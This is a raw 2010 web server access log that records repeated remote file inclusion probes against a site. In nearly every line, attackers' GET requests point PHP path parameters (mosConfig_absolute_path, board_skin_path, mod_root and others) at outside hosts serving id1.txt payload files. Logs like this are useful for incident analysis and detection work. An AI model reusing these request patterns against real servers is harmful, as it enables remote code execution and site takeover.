202.124.116.194 - - [25/Feb/2010:06:48:56 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:56 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:49:55 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:49:55 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:49:55 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:49:56 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:49:56 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:49:56 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:50:35 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:50:35 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:50:35 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:50:52 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:50:52 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:50:53 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:50:54 -0800] "GET /logs/access_100126.log/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:50:54 -0800] "GET /logs/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:50:54 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:50:54 -0800] "GET /logs/access_100209.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:50:54 -0800] "GET /C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:51:03 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:51:03 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:51:03 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:51:20 -0800] "GET /logs/access_100217.log//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:51:23 -0800] "GET /logs/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:51:23 -0800] "GET /C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:51:23 -0800] "GET /logs/access_100126.log/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:51:25 -0800] "GET /logs/access_100212.log/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:51:26 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:51:26 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:51:26 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:51:56 -0800] "GET /logs/access_100212.log/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:52:01 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:52:01 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:52:01 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:08 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:08 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:08 -0800] "GET /config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:09 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:09 -0800] "GET /config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:10 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:14 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:14 -0800] "GET /config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:52:14 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:52:24 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:06:53:03 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:53:05 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:53:05 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:53:05 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:53:29 -0800] "GET /logs/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:53:29 -0800] "GET /logs/access_100126.log/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:53:30 -0800] "GET /C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:53:31 -0800] "GET /logs/access_100209.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:06:53:35 -0800] "GET /logs/access_100204.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:53:51 -0800] "GET /logs/access_100212.log/C:%5Cappserv%5Cwww%5Cindex.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:54:36 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:54:36 -0800] "GET /logs/access_100124.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:54:36 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:54:51 -0800] "GET /logs/access_100217.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:54:52 -0800] "GET /logs//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:54:52 -0800] "GET /amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:06:55:12 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:06:55:20 -0800] "GET /logs/access_100213.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:56:07 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:56:07 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:11 -0800] "GET /admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:11 -0800] "GET /logs//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:11 -0800] "GET /logs/access_100122.log%20%20//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:15 -0800] "GET /logs/access_100123.log%20%20//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:56:16 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:56:31 -0800] "GET /admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:56:31 -0800] "GET /logs//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:56:32 -0800] "GET /logs/access_100122.log%20%20//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:33 -0800] "GET /admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:33 -0800] "GET /logs//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:56:33 -0800] "GET /logs/access_100122.log//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:56:47 -0800] "GET /admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:57:28 -0800] "GET /logs/access_100123.log%20%20//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:57:37 -0800] "GET /logs/access_100123.log/?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:57:37 -0800] "GET /logs/?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:57:50 -0800] "GET /logs/access_100123.log/?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:57:50 -0800] "GET /logs/?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:57:50 -0800] "GET /?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:57:52 -0800] "GET /logs/access_100123.log%20%20//admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:57:53 -0800] "GET /logs/access_100219.log%20%20//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:57:53 -0800] "GET /delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:57:53 -0800] "GET /logs//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:58:31 -0800] "GET /logs/access_100123.log/?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:58:31 -0800] "GET /logs/?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:06:58:32 -0800] "GET /?sourcedir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:58:38 -0800] "GET /logs//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:58:38 -0800] "GET /delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:58:38 -0800] "GET /logs/access_100219.log%20%20//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:58:38 -0800] "GET /logs/access_100219.log%20%20//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:58:38 -0800] "GET /delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:58:38 -0800] "GET /logs//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:59:43 -0800] "GET /logs////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:59:43 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:59:43 -0800] "GET ///delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:00:00 -0800] "GET /logs/access_100206.log%20%20////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:00:31 -0800] "GET ///delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:00:31 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:00:31 -0800] "GET /logs////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:00:43 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:00:43 -0800] "GET ///delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:00:43 -0800] "GET /logs////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:00:45 -0800] "GET ///delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:00:45 -0800] "GET /logs////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:00:45 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:00:58 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:01:47 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:01:47 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:01:47 -0800] "GET /logs/access_100124.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:01:51 -0800] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.72.244 - - [25/Feb/2010:07:02:54 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.72.244 - - [25/Feb/2010:07:02:54 -0800] "GET /orange_g/forum/viewtopic.php?p=26507 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
85.118.224.2 - - [25/Feb/2010:07:04:47 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.zetaintelex.com/images/smilies/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.118.224.2 - - [25/Feb/2010:07:04:47 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.zetaintelex.com/images/smilies/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.118.224.2 - - [25/Feb/2010:07:04:47 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.zetaintelex.com/images/smilies/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:05:34 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:05:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
